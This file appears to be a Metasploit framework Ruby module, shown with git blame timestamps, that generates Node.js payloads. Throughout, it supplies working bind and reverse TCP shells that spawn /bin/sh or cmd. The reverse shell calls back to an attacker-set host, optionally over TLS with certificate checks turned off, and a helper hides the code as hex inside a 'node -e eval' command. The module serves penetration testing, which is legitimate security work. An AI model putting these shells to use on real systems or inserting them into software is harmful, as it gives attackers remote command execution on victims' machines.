2013-10-12 08:19:06 +00:00
|
|
|
# -*- coding: binary -*-
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
module Msf::Payload::NodeJS
|
|
|
|
# Outputs a javascript snippet that spawns a bind TCP shell
|
|
|
|
# @return [String] javascript code that executes bind TCP payload
|
|
|
|
def nodejs_bind_tcp
|
|
|
|
cmd = <<-EOS
|
|
|
|
(function(){
|
|
|
|
var require = global.require || global.process.mainModule.constructor._load;
|
|
|
|
if (!require) return;
|
|
|
|
|
|
|
|
var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh";
|
|
|
|
var net = require("net"),
|
|
|
|
cp = require("child_process"),
|
|
|
|
util = require("util");
|
|
|
|
|
|
|
|
var server = net.createServer(function(socket) {
|
|
|
|
var sh = cp.spawn(cmd, []);
|
|
|
|
socket.pipe(sh.stdin);
|
|
|
|
util.pump(sh.stdout, socket);
|
|
|
|
util.pump(sh.stderr, socket);
|
|
|
|
});
|
|
|
|
server.listen(#{datastore['LPORT']});
|
|
|
|
})();
|
|
|
|
EOS
|
|
|
|
cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')
|
|
|
|
end
|
|
|
|
|
|
|
|
# Outputs a javascript snippet that spawns a reverse TCP shell
|
2013-10-12 08:32:52 +00:00
|
|
|
# @param [Hash] opts the options to create the reverse TCP payload with
|
|
|
|
# @option opts [Boolean] :use_ssl use SSL when communicating with the shell. defaults to false.
|
2013-10-12 08:19:06 +00:00
|
|
|
# @return [String] javascript code that executes reverse TCP payload
|
2013-10-12 08:32:52 +00:00
|
|
|
def nodejs_reverse_tcp(opts={})
|
|
|
|
use_ssl = opts.fetch(:use_ssl, false)
|
|
|
|
tls_hash = if use_ssl then '{rejectUnauthorized:false}, ' else '' end
|
|
|
|
net_lib = if use_ssl then 'tls' else 'net' end
|
2013-10-12 08:19:06 +00:00
|
|
|
lhost = Rex::Socket.is_ipv6?(lhost) ? "[#{datastore['LHOST']}]" : datastore['LHOST']
|
2013-10-12 08:32:52 +00:00
|
|
|
# the global.process.mainModule.constructor._load fallback for require() is
|
|
|
|
# handy when the payload is eval()'d into a sandboxed context: the reference
|
|
|
|
# to 'require' is missing, but can be looked up from the 'global' object.
|
|
|
|
#
|
|
|
|
# however, this fallback might break in later versions of nodejs.
|
2013-10-12 08:19:06 +00:00
|
|
|
cmd = <<-EOS
|
|
|
|
(function(){
|
|
|
|
var require = global.require || global.process.mainModule.constructor._load;
|
|
|
|
if (!require) return;
|
|
|
|
var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh";
|
2013-10-12 08:32:52 +00:00
|
|
|
var net = require("#{net_lib}"),
|
2013-10-12 08:19:06 +00:00
|
|
|
cp = require("child_process"),
|
|
|
|
util = require("util"),
|
|
|
|
sh = cp.spawn(cmd, []);
|
|
|
|
var client = this;
|
2013-10-12 08:32:52 +00:00
|
|
|
client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
|
2013-10-12 08:19:06 +00:00
|
|
|
client.socket.pipe(sh.stdin);
|
|
|
|
util.pump(sh.stdout, client.socket);
|
|
|
|
util.pump(sh.stderr, client.socket);
|
|
|
|
});
|
|
|
|
})();
|
|
|
|
EOS
|
|
|
|
cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')
|
|
|
|
end
|
|
|
|
|
|
|
|
# Wraps the javascript code param in a "node" command invocation
|
|
|
|
# @param [String] code the javascript code to run
|
|
|
|
# @return [String] a command that invokes "node" and passes the code
|
|
|
|
def nodejs_cmd(code)
|
|
|
|
"node -e 'eval(\"#{Rex::Text.to_hex(code, "\\x")}\");'"
|
|
|
|
end
|
|
|
|
end
|